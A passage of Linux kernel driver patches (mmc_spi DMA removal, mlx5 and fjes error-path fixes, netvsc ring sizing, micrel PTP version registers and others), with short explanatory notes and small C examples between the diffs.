+@@ -783,30 +722,12 @@ mmc_spi_readblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 	}
+ 	leftover = status << 1;
+ 
+-	if (host->dma_dev) {
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+-		dma_sync_single_for_device(host->dma_dev,
+-				t->rx_dma, t->len,
+-				DMA_FROM_DEVICE);
+-	}
+-
+ 	status = spi_sync_locked(spi, &host->m);
+ 	if (status < 0) {
+ 		dev_dbg(&spi->dev, "read error %d\n", status);
+ 		return status;
+ 	}
+ 
+-	if (host->dma_dev) {
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				t->rx_dma, t->len,
+-				DMA_FROM_DEVICE);
+-	}
+-
+ 	if (bitshift) {
+ 		/* Walk through the data and the crc and do
+ 		 * all the magic to get byte-aligned data.
+@@ -841,8 +762,6 @@ mmc_spi_readblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 	}
+ 
+ 	t->rx_buf += t->len;
+-	if (host->dma_dev)
+-		t->rx_dma += t->len;
+ 
+ 	return 0;
+ }
+@@ -857,7 +776,6 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 		struct mmc_data *data, u32 blk_size)
+ {
+ 	struct spi_device	*spi = host->spi;
+-	struct device		*dma_dev = host->dma_dev;
+ 	struct spi_transfer	*t;
+ 	enum dma_data_direction	direction = mmc_get_dma_dir(data);
+ 	struct scatterlist	*sg;
+@@ -884,31 +802,8 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 	 */
+ 	for_each_sg(data->sg, sg, data->sg_len, n_sg) {
+ 		int			status = 0;
+-		dma_addr_t		dma_addr = 0;
+ 		void			*kmap_addr;
+ 		unsigned		length = sg->length;
+-		enum dma_data_direction	dir = direction;
+-
+-		/* set up dma mapping for controller drivers that might
+-		 * use DMA ... though they may fall back to PIO
+-		 */
+-		if (dma_dev) {
+-			/* never invalidate whole *shared* pages ... */
+-			if ((sg->offset != 0 || length != PAGE_SIZE)
+-					&& dir == DMA_FROM_DEVICE)
+-				dir = DMA_BIDIRECTIONAL;
+-
+-			dma_addr = dma_map_page(dma_dev, sg_page(sg), 0,
+-						PAGE_SIZE, dir);
+-			if (dma_mapping_error(dma_dev, dma_addr)) {
+-				data->error = -EFAULT;
+-				break;
+-			}
+-			if (direction == DMA_TO_DEVICE)
+-				t->tx_dma = dma_addr + sg->offset;
+-			else
+-				t->rx_dma = dma_addr + sg->offset;
+-		}
+ 
+ 		/* allow pio too; we don't allow highmem */
+ 		kmap_addr = kmap(sg_page(sg));
+@@ -941,8 +836,6 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 		if (direction == DMA_FROM_DEVICE)
+ 			flush_dcache_page(sg_page(sg));
+ 		kunmap(sg_page(sg));
+-		if (dma_dev)
+-			dma_unmap_page(dma_dev, dma_addr, PAGE_SIZE, dir);
+ 
+ 		if (status < 0) {
+ 			data->error = status;
+@@ -977,21 +870,9 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 		scratch->status[0] = SPI_TOKEN_STOP_TRAN;
+ 
+ 		host->early_status.tx_buf = host->early_status.rx_buf;
+-		host->early_status.tx_dma = host->early_status.rx_dma;
+ 		host->early_status.len = statlen;
+ 
+-		if (host->dma_dev)
+-			dma_sync_single_for_device(host->dma_dev,
+-					host->data_dma, sizeof(*scratch),
+-					DMA_BIDIRECTIONAL);
+-
+ 		tmp = spi_sync_locked(spi, &host->m);
+-
+-		if (host->dma_dev)
+-			dma_sync_single_for_cpu(host->dma_dev,
+-					host->data_dma, sizeof(*scratch),
+-					DMA_BIDIRECTIONAL);
+-
+ 		if (tmp < 0) {
+ 			if (!data->error)
+ 				data->error = tmp;
+@@ -1265,52 +1146,6 @@ mmc_spi_detect_irq(int irq, void *mmc)
+ 	return IRQ_HANDLED;
+ }
+ 
+-#ifdef CONFIG_HAS_DMA
+-static int mmc_spi_dma_alloc(struct mmc_spi_host *host)
+-{
+-	struct spi_device *spi = host->spi;
+-	struct device *dev;
+-
+-	if (!spi->master->dev.parent->dma_mask)
+-		return 0;
+-
+-	dev = spi->master->dev.parent;
+-
+-	host->ones_dma = dma_map_single(dev, host->ones, MMC_SPI_BLOCKSIZE,
+-					DMA_TO_DEVICE);
+-	if (dma_mapping_error(dev, host->ones_dma))
+-		return -ENOMEM;
+-
+-	host->data_dma = dma_map_single(dev, host->data, sizeof(*host->data),
+-					DMA_BIDIRECTIONAL);
+-	if (dma_mapping_error(dev, host->data_dma)) {
+-		dma_unmap_single(dev, host->ones_dma, MMC_SPI_BLOCKSIZE,
+-				 DMA_TO_DEVICE);
+-		return -ENOMEM;
+-	}
+-
+-	dma_sync_single_for_cpu(dev, host->data_dma, sizeof(*host->data),
+-				DMA_BIDIRECTIONAL);
+-
+-	host->dma_dev = dev;
+-	return 0;
+-}
+-
+-static void mmc_spi_dma_free(struct mmc_spi_host *host)
+-{
+-	if (!host->dma_dev)
+-		return;
+-
+-	dma_unmap_single(host->dma_dev, host->ones_dma, MMC_SPI_BLOCKSIZE,
+-			 DMA_TO_DEVICE);
+-	dma_unmap_single(host->dma_dev, host->data_dma,	sizeof(*host->data),
+-			 DMA_BIDIRECTIONAL);
+-}
+-#else
+-static inline int mmc_spi_dma_alloc(struct mmc_spi_host *host) { return 0; }
+-static inline void mmc_spi_dma_free(struct mmc_spi_host *host) {}
+-#endif
+-
+ static int mmc_spi_probe(struct spi_device *spi)
+ {
+ 	void			*ones;
+@@ -1402,24 +1237,17 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 			host->powerup_msecs = 250;
+ 	}
+ 
+-	/* preallocate dma buffers */
++	/* Preallocate buffers */
+ 	host->data = kmalloc(sizeof(*host->data), GFP_KERNEL);
+ 	if (!host->data)
+ 		goto fail_nobuf1;
+ 
+-	status = mmc_spi_dma_alloc(host);
+-	if (status)
+-		goto fail_dma;
+-
+ 	/* setup message for status/busy readback */
+ 	spi_message_init(&host->readback);
+-	host->readback.is_dma_mapped = (host->dma_dev != NULL);
+ 
+ 	spi_message_add_tail(&host->status, &host->readback);
+ 	host->status.tx_buf = host->ones;
+-	host->status.tx_dma = host->ones_dma;
+ 	host->status.rx_buf = &host->data->status;
+-	host->status.rx_dma = host->data_dma + offsetof(struct scratch, status);
+ 	host->status.cs_change = 1;
+ 
+ 	/* register card detect irq */
+@@ -1464,9 +1292,8 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 	if (!status)
+ 		has_ro = true;
+ 
+-	dev_info(&spi->dev, "SD/MMC host %s%s%s%s%s\n",
++	dev_info(&spi->dev, "SD/MMC host %s%s%s%s\n",
+ 			dev_name(&mmc->class_dev),
+-			host->dma_dev ? "" : ", no DMA",
+ 			has_ro ? "" : ", no WP",
+ 			(host->pdata && host->pdata->setpower)
+ 				? "" : ", no poweroff",
+@@ -1477,8 +1304,6 @@ static int mmc_spi_probe(struct spi_device *spi)
+ fail_gpiod_request:
+ 	mmc_remove_host(mmc);
+ fail_glue_init:
+-	mmc_spi_dma_free(host);
+-fail_dma:
+ 	kfree(host->data);
+ fail_nobuf1:
+ 	mmc_spi_put_pdata(spi);
+@@ -1500,7 +1325,6 @@ static void mmc_spi_remove(struct spi_device *spi)
+ 
+ 	mmc_remove_host(mmc);
+ 
+-	mmc_spi_dma_free(host);
+ 	kfree(host->data);
+ 	kfree(host->ones);
+ 
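
The mmc_spi diff deletes the driver's entire hand-rolled DMA layer: the pre-mapped tx_dma/rx_dma pointers, the is_dma_mapped flag, and all the dma_sync_single_for_*() choreography. SPI controller drivers map kmalloc'd buffers themselves these days, so a transfer only needs CPU pointers. A status read after the conversion, sketched in kernel context:

	static int read_status(struct mmc_spi_host *host, unsigned int len)
	{
		struct spi_transfer t = {
			.tx_buf	= host->ones,		/* kmalloc'd: DMA-safe */
			.rx_buf	= &host->data->status,
			.len	= len,
		};
		struct spi_message m;

		spi_message_init_with_transfers(&m, &t, 1);
		return spi_sync_locked(host->spi, &m);
	}
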
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index df4d88d35701b..f810b5dc25f01 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -12269,6 +12269,11 @@ static int bnxt_fw_init_one_p1(struct bnxt *bp)
+ 
+ 	bp->fw_cap = 0;
+ 	rc = bnxt_hwrm_ver_get(bp);
++	/* FW may be unresponsive after FLR. FLR must complete within 100 msec
++	 * so wait before continuing with recovery.
++	 */
++	if (rc)
++		msleep(100);
+ 	bnxt_try_map_fw_health_reg(bp);
+ 	if (rc) {
+ 		rc = bnxt_try_recover_fw(bp);
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 6d1b760022821..97d12c7eea772 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -1917,6 +1917,7 @@ static void fec_enet_adjust_link(struct net_device *ndev)
+ 
+ 		/* if any of the above changed restart the FEC */
+ 		if (status_change) {
++			netif_stop_queue(ndev);
+ 			napi_disable(&fep->napi);
+ 			netif_tx_lock_bh(ndev);
+ 			fec_restart(ndev);
+@@ -1926,6 +1927,7 @@ static void fec_enet_adjust_link(struct net_device *ndev)
+ 		}
+ 	} else {
+ 		if (fep->link) {
++			netif_stop_queue(ndev);
+ 			napi_disable(&fep->napi);
+ 			netif_tx_lock_bh(ndev);
+ 			fec_stop(ndev);
+diff --git a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+index f936640cca4e6..2f80ee84c7ece 100644
+--- a/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
++++ b/drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c
+@@ -614,12 +614,38 @@ static void mvpp23_bm_set_8pool_mode(struct mvpp2 *priv)
+ 	mvpp2_write(priv, MVPP22_BM_POOL_BASE_ADDR_HIGH_REG, val);
+ }
+ 
++/* Cleanup pool before actual initialization in the OS */
++static void mvpp2_bm_pool_cleanup(struct mvpp2 *priv, int pool_id)
++{
++	unsigned int thread = mvpp2_cpu_to_thread(priv, get_cpu());
++	u32 val;
++	int i;
++
++	/* Drain the BM from all possible residues left by firmware */
++	for (i = 0; i < MVPP2_BM_POOL_SIZE_MAX; i++)
++		mvpp2_thread_read(priv, thread, MVPP2_BM_PHY_ALLOC_REG(pool_id));
++
++	put_cpu();
++
++	/* Stop the BM pool */
++	val = mvpp2_read(priv, MVPP2_BM_POOL_CTRL_REG(pool_id));
++	val |= MVPP2_BM_STOP_MASK;
++	mvpp2_write(priv, MVPP2_BM_POOL_CTRL_REG(pool_id), val);
++}
++
+ static int mvpp2_bm_init(struct device *dev, struct mvpp2 *priv)
+ {
+ 	enum dma_data_direction dma_dir = DMA_FROM_DEVICE;
+ 	int i, err, poolnum = MVPP2_BM_POOLS_NUM;
+ 	struct mvpp2_port *port;
+ 
++	if (priv->percpu_pools)
++		poolnum = mvpp2_get_nrxqs(priv) * 2;
++
++	/* Clean up the pool state in case it contains stale state */
++	for (i = 0; i < poolnum; i++)
++		mvpp2_bm_pool_cleanup(priv, i);
++
+ 	if (priv->percpu_pools) {
+ 		for (i = 0; i < priv->port_count; i++) {
+ 			port = priv->port_list[i];
+@@ -629,7 +655,6 @@ static int mvpp2_bm_init(struct device *dev, struct mvpp2 *priv)
+ 			}
+ 		}
+ 
+-		poolnum = mvpp2_get_nrxqs(priv) * 2;
+ 		for (i = 0; i < poolnum; i++) {
+ 			/* the pool in use */
+ 			int pn = i / (poolnum / 2);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+index e1283531e0b81..671adbad0a40f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+@@ -436,6 +436,7 @@ static int fs_any_create_groups(struct mlx5e_flow_table *ft)
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if  (!in || !ft->g) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		kvfree(in);
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+index 29dd3a04c1545..d3de1b7a80bf5 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/params.c
+@@ -990,8 +990,8 @@ void mlx5e_build_sq_param(struct mlx5_core_dev *mdev,
+ 	void *wq = MLX5_ADDR_OF(sqc, sqc, wq);
+ 	bool allow_swp;
+ 
+-	allow_swp =
+-		mlx5_geneve_tx_allowed(mdev) || !!mlx5_ipsec_device_caps(mdev);
++	allow_swp = mlx5_geneve_tx_allowed(mdev) ||
++		    (mlx5_ipsec_device_caps(mdev) & MLX5_IPSEC_CAP_CRYPTO);
+ 	mlx5e_build_sq_param_common(mdev, param);
+ 	MLX5_SET(wq, wq, log_wq_sz, params->log_sq_size);
+ 	MLX5_SET(sqc, sqc, allow_swp, allow_swp);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+index 16bcceec16c44..785f188148d8f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+@@ -34,7 +34,6 @@
+ #ifndef __MLX5E_IPSEC_H__
+ #define __MLX5E_IPSEC_H__
+ 
+-#ifdef CONFIG_MLX5_EN_IPSEC
+ 
+ #include <linux/mlx5/device.h>
+ #include <net/xfrm.h>
+@@ -146,6 +145,7 @@ struct mlx5e_ipsec_sa_entry {
+ 	struct mlx5e_ipsec_modify_state_work modify_work;
+ };
+ 
++#ifdef CONFIG_MLX5_EN_IPSEC
+ int mlx5e_ipsec_init(struct mlx5e_priv *priv);
+ void mlx5e_ipsec_cleanup(struct mlx5e_priv *priv);
+ void mlx5e_ipsec_build_netdev(struct mlx5e_priv *priv);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+index dc0a0a27ac84a..58eacba6de8cd 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+@@ -255,11 +255,13 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 
+ 	ft->g = kcalloc(MLX5E_ARFS_NUM_GROUPS,
+ 			sizeof(*ft->g), GFP_KERNEL);
+-	in = kvzalloc(inlen, GFP_KERNEL);
+-	if  (!in || !ft->g) {
+-		kfree(ft->g);
+-		kvfree(in);
++	if (!ft->g)
+ 		return -ENOMEM;
++
++	in = kvzalloc(inlen, GFP_KERNEL);
++	if (!in) {
++		err = -ENOMEM;
++		goto err_free_g;
+ 	}
+ 
+ 	mc = MLX5_ADDR_OF(create_flow_group_in, in, match_criteria);
+@@ -279,7 +281,7 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 		break;
+ 	default:
+ 		err = -EINVAL;
+-		goto out;
++		goto err_free_in;
+ 	}
+ 
+ 	switch (type) {
+@@ -301,7 +303,7 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 		break;
+ 	default:
+ 		err = -EINVAL;
+-		goto out;
++		goto err_free_in;
+ 	}
+ 
+ 	MLX5_SET_CFG(in, match_criteria_enable, MLX5_MATCH_OUTER_HEADERS);
+@@ -310,7 +312,7 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 	MLX5_SET_CFG(in, end_flow_index, ix - 1);
+ 	ft->g[ft->num_groups] = mlx5_create_flow_group(ft->t, in);
+ 	if (IS_ERR(ft->g[ft->num_groups]))
+-		goto err;
++		goto err_clean_group;
+ 	ft->num_groups++;
+ 
+ 	memset(in, 0, inlen);
+@@ -319,18 +321,20 @@ static int arfs_create_groups(struct mlx5e_flow_table *ft,
+ 	MLX5_SET_CFG(in, end_flow_index, ix - 1);
+ 	ft->g[ft->num_groups] = mlx5_create_flow_group(ft->t, in);
+ 	if (IS_ERR(ft->g[ft->num_groups]))
+-		goto err;
++		goto err_clean_group;
+ 	ft->num_groups++;
+ 
+ 	kvfree(in);
+ 	return 0;
+ 
+-err:
++err_clean_group:
+ 	err = PTR_ERR(ft->g[ft->num_groups]);
+ 	ft->g[ft->num_groups] = NULL;
+-out:
++err_free_in:
+ 	kvfree(in);
+-
++err_free_g:
++	kfree(ft->g);
++	ft->g = NULL;
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c
+index c971ff04dd046..c215252f2f534 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/aso.c
+@@ -98,7 +98,7 @@ static int create_aso_cq(struct mlx5_aso_cq *cq, void *cqc_data)
+ 	mlx5_fill_page_frag_array(&cq->wq_ctrl.buf,
+ 				  (__be64 *)MLX5_ADDR_OF(create_cq_in, in, pas));
+ 
+-	MLX5_SET(cqc,   cqc, cq_period_mode, DIM_CQ_PERIOD_MODE_START_FROM_EQE);
++	MLX5_SET(cqc,   cqc, cq_period_mode, MLX5_CQ_PERIOD_MODE_START_FROM_EQE);
+ 	MLX5_SET(cqc,   cqc, c_eqn_or_apu_element, eqn);
+ 	MLX5_SET(cqc,   cqc, uar_page,      mdev->priv.uar->index);
+ 	MLX5_SET(cqc,   cqc, log_page_size, cq->wq_ctrl.buf.page_shift -
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+index a3e7602b044e5..bf7517725d8c6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_action.c
+@@ -673,6 +673,7 @@ int mlx5dr_actions_build_ste_arr(struct mlx5dr_matcher *matcher,
+ 		switch (action_type) {
+ 		case DR_ACTION_TYP_DROP:
+ 			attr.final_icm_addr = nic_dmn->drop_icm_addr;
++			attr.hit_gvmi = nic_dmn->drop_icm_addr >> 48;
+ 			break;
+ 		case DR_ACTION_TYP_FT:
+ 			dest_action = action;
+@@ -761,11 +762,17 @@ int mlx5dr_actions_build_ste_arr(struct mlx5dr_matcher *matcher,
+ 							action->sampler->tx_icm_addr;
+ 			break;
+ 		case DR_ACTION_TYP_VPORT:
+-			attr.hit_gvmi = action->vport->caps->vhca_gvmi;
+-			dest_action = action;
+-			attr.final_icm_addr = rx_rule ?
+-				action->vport->caps->icm_address_rx :
+-				action->vport->caps->icm_address_tx;
++			if (unlikely(rx_rule && action->vport->caps->num == MLX5_VPORT_UPLINK)) {
++				/* can't go to uplink on RX rule - dropping instead */
++				attr.final_icm_addr = nic_dmn->drop_icm_addr;
++				attr.hit_gvmi = nic_dmn->drop_icm_addr >> 48;
++			} else {
++				attr.hit_gvmi = action->vport->caps->vhca_gvmi;
++				dest_action = action;
++				attr.final_icm_addr = rx_rule ?
++						      action->vport->caps->icm_address_rx :
++						      action->vport->caps->icm_address_tx;
++			}
+ 			break;
+ 		case DR_ACTION_TYP_POP_VLAN:
+ 			if (!rx_rule && !(dmn->ste_ctx->actions_caps &
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 8f8de14347a94..e988a60c8561b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -7166,6 +7166,9 @@ int stmmac_dvr_probe(struct device *device,
+ 		dev_err(priv->device, "unable to bring out of ahb reset: %pe\n",
+ 			ERR_PTR(ret));
+ 
++	/* Wait a bit for the reset to take effect */
++	udelay(10);
++
+ 	/* Init MAC and get the capabilities */
+ 	ret = stmmac_hw_init(priv);
+ 	if (ret)
+diff --git a/drivers/net/fjes/fjes_hw.c b/drivers/net/fjes/fjes_hw.c
+index 704e949484d0c..b9b5554ea8620 100644
+--- a/drivers/net/fjes/fjes_hw.c
++++ b/drivers/net/fjes/fjes_hw.c
+@@ -221,21 +221,25 @@ static int fjes_hw_setup(struct fjes_hw *hw)
+ 
+ 	mem_size = FJES_DEV_REQ_BUF_SIZE(hw->max_epid);
+ 	hw->hw_info.req_buf = kzalloc(mem_size, GFP_KERNEL);
+-	if (!(hw->hw_info.req_buf))
+-		return -ENOMEM;
++	if (!(hw->hw_info.req_buf)) {
++		result = -ENOMEM;
++		goto free_ep_info;
++	}
+ 
+ 	hw->hw_info.req_buf_size = mem_size;
+ 
+ 	mem_size = FJES_DEV_RES_BUF_SIZE(hw->max_epid);
+ 	hw->hw_info.res_buf = kzalloc(mem_size, GFP_KERNEL);
+-	if (!(hw->hw_info.res_buf))
+-		return -ENOMEM;
++	if (!(hw->hw_info.res_buf)) {
++		result = -ENOMEM;
++		goto free_req_buf;
++	}
+ 
+ 	hw->hw_info.res_buf_size = mem_size;
+ 
+ 	result = fjes_hw_alloc_shared_status_region(hw);
+ 	if (result)
+-		return result;
++		goto free_res_buf;
+ 
+ 	hw->hw_info.buffer_share_bit = 0;
+ 	hw->hw_info.buffer_unshare_reserve_bit = 0;
+@@ -246,11 +250,11 @@ static int fjes_hw_setup(struct fjes_hw *hw)
+ 
+ 			result = fjes_hw_alloc_epbuf(&buf_pair->tx);
+ 			if (result)
+-				return result;
++				goto free_epbuf;
+ 
+ 			result = fjes_hw_alloc_epbuf(&buf_pair->rx);
+ 			if (result)
+-				return result;
++				goto free_epbuf;
+ 
+ 			spin_lock_irqsave(&hw->rx_status_lock, flags);
+ 			fjes_hw_setup_epbuf(&buf_pair->tx, mac,
+@@ -273,6 +277,25 @@ static int fjes_hw_setup(struct fjes_hw *hw)
+ 	fjes_hw_init_command_registers(hw, &param);
+ 
+ 	return 0;
++
++free_epbuf:
++	for (epidx = 0; epidx < hw->max_epid ; epidx++) {
++		if (epidx == hw->my_epid)
++			continue;
++		fjes_hw_free_epbuf(&hw->ep_shm_info[epidx].tx);
++		fjes_hw_free_epbuf(&hw->ep_shm_info[epidx].rx);
++	}
++	fjes_hw_free_shared_status_region(hw);
++free_res_buf:
++	kfree(hw->hw_info.res_buf);
++	hw->hw_info.res_buf = NULL;
++free_req_buf:
++	kfree(hw->hw_info.req_buf);
++	hw->hw_info.req_buf = NULL;
++free_ep_info:
++	kfree(hw->ep_shm_info);
++	hw->ep_shm_info = NULL;
++	return result;
+ }
+ 
+ static void fjes_hw_cleanup(struct fjes_hw *hw)
+diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
+index 0285894c892ab..c1aac6ceb29e6 100644
+--- a/drivers/net/hyperv/netvsc_drv.c
++++ b/drivers/net/hyperv/netvsc_drv.c
+@@ -44,7 +44,7 @@
+ 
+ static unsigned int ring_size __ro_after_init = 128;
+ module_param(ring_size, uint, 0444);
+-MODULE_PARM_DESC(ring_size, "Ring buffer size (# of pages)");
++MODULE_PARM_DESC(ring_size, "Ring buffer size (# of 4K pages)");
+ unsigned int netvsc_ring_bytes __ro_after_init;
+ 
+ static const u32 default_msg = NETIF_MSG_DRV | NETIF_MSG_PROBE |
+@@ -2801,7 +2801,7 @@ static int __init netvsc_drv_init(void)
+ 		pr_info("Increased ring_size to %u (min allowed)\n",
+ 			ring_size);
+ 	}
+-	netvsc_ring_bytes = ring_size * PAGE_SIZE;
++	netvsc_ring_bytes = VMBUS_RING_SIZE(ring_size * 4096);
+ 
+ 	register_netdevice_notifier(&netvsc_netdev_notifier);
+ 
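
The netvsc fix pins the ring_size unit to 4 KiB: the parameter was documented in "pages" but multiplied by PAGE_SIZE, so the same ring_size=128 allocated a 16x larger ring on a 64 KiB-page kernel than on x86; VMBUS_RING_SIZE() additionally rounds the byte count up to what the VMBus ring layout needs. The arithmetic, runnable in plain C:

	#include <stdio.h>

	int main(void)
	{
		unsigned int ring_size = 128;

		printf("4K pages : %u bytes\n", ring_size * 4096);	/* 524288 */
		printf("64K pages: %u bytes\n", ring_size * 65536);	/* old: 8388608 */
		return 0;
	}
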
+diff --git a/drivers/net/phy/micrel.c b/drivers/net/phy/micrel.c
+index 7cbcf51bae924..9481f172830f5 100644
+--- a/drivers/net/phy/micrel.c
++++ b/drivers/net/phy/micrel.c
+@@ -120,6 +120,11 @@
+  */
+ #define LAN8814_1PPM_FORMAT			17179
+ 
++#define PTP_RX_VERSION				0x0248
++#define PTP_TX_VERSION				0x0288
++#define PTP_MAX_VERSION(x)			(((x) & GENMASK(7, 0)) << 8)
++#define PTP_MIN_VERSION(x)			((x) & GENMASK(7, 0))
++
+ #define PTP_RX_MOD				0x024F
+ #define PTP_RX_MOD_BAD_UDPV4_CHKSUM_FORCE_FCS_DIS_ BIT(3)
+ #define PTP_RX_TIMESTAMP_EN			0x024D
+@@ -2922,6 +2927,12 @@ static void lan8814_ptp_init(struct phy_device *phydev)
+ 	lanphy_write_page_reg(phydev, 5, PTP_TX_PARSE_IP_ADDR_EN, 0);
+ 	lanphy_write_page_reg(phydev, 5, PTP_RX_PARSE_IP_ADDR_EN, 0);
+ 
++	/* Disable checking for minorVersionPTP field */
++	lanphy_write_page_reg(phydev, 5, PTP_RX_VERSION,
++			      PTP_MAX_VERSION(0xff) | PTP_MIN_VERSION(0x0));
++	lanphy_write_page_reg(phydev, 5, PTP_TX_VERSION,
++			      PTP_MAX_VERSION(0xff) | PTP_MIN_VERSION(0x0));
++
+ 	skb_queue_head_init(&ptp_priv->tx_queue);
+ 	skb_queue_head_init(&ptp_priv->rx_queue);
+ 	INIT_LIST_HEAD(&ptp_priv->rx_ts_list);
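
The lan8814 hunk writes one 16-bit register holding two byte-wide fields, the maximum accepted PTP version in bits 15:8 and the minimum in bits 7:0; writing max=0xff and min=0 accepts any versionPTP/minorVersionPTP in incoming frames. How the macros pack the value, runnable with a userspace stand-in for GENMASK():

	#include <stdio.h>
	#include <stdint.h>

	#define GENMASK(h, l)		(((~0u) << (l)) & (~0u >> (31 - (h))))
	#define PTP_MAX_VERSION(x)	(((x) & GENMASK(7, 0)) << 8)
	#define PTP_MIN_VERSION(x)	((x) & GENMASK(7, 0))

	int main(void)
	{
		uint16_t val = PTP_MAX_VERSION(0xff) | PTP_MIN_VERSION(0x0);

		printf("reg = 0x%04x\n", val);	/* prints reg = 0xff00 */
		return 0;
	}
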
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index d373953ddc300..367255bb44cdc 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -1622,13 +1622,19 @@ static int tun_xdp_act(struct tun_struct *tun, struct bpf_prog *xdp_prog,
+ 	switch (act) {
+ 	case XDP_REDIRECT:
+ 		err = xdp_do_redirect(tun->dev, xdp, xdp_prog);
+-		if (err)
++		if (err) {
++			dev_core_stats_rx_dropped_inc(tun->dev);
+ 			return err;
++		}
++		dev_sw_netstats_rx_add(tun->dev, xdp->data_end - xdp->data);
+ 		break;
+ 	case XDP_TX:
+ 		err = tun_xdp_tx(tun->dev, xdp);
+-		if (err < 0)
++		if (err < 0) {
++			dev_core_stats_rx_dropped_inc(tun->dev);
+ 			return err;
++		}
++		dev_sw_netstats_rx_add(tun->dev, xdp->data_end - xdp->data);
+ 		break;
+ 	case XDP_PASS:
+ 		break;
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index a1d34f3e7a9f4..5979d904bbbd2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -1082,7 +1082,7 @@ static int iwl_dbg_tlv_override_trig_node(struct iwl_fw_runtime *fwrt,
+ 		node_trig = (void *)node_tlv->data;
+ 	}
+ 
+-	memcpy(node_trig->data + offset, trig->data, trig_data_len);
++	memcpy((u8 *)node_trig->data + offset, trig->data, trig_data_len);
+ 	node_tlv->length = cpu_to_le32(size);
+ 
+ 	if (policy & IWL_FW_INI_APPLY_POLICY_OVERRIDE_CFG) {
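
The iwlwifi one-liner is a pointer-arithmetic fix: the (u8 *) cast suggests node_trig->data has a wider element type, in which case "data + offset" scales the offset by the element size even though offset and trig_data_len are byte counts. The difference, runnable in plain C:

	#include <stdio.h>
	#include <stdint.h>

	int main(void)
	{
		uint32_t data[8] = { 0 };
		size_t offset = 4;	/* intended as 4 bytes */

		printf("scaled: %zu bytes\n",
		       (size_t)((char *)(data + offset) - (char *)data));	/* 16 */
		printf("byte  : %zu bytes\n",
		       (size_t)(((uint8_t *)data + offset) - (uint8_t *)data));	/* 4 */
		return 0;
	}
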
+diff --git a/drivers/opp/core.c b/drivers/opp/core.c
+index f0d70ecc0271b..71d3e3ba909a3 100644
+--- a/drivers/opp/core.c
++++ b/drivers/opp/core.c
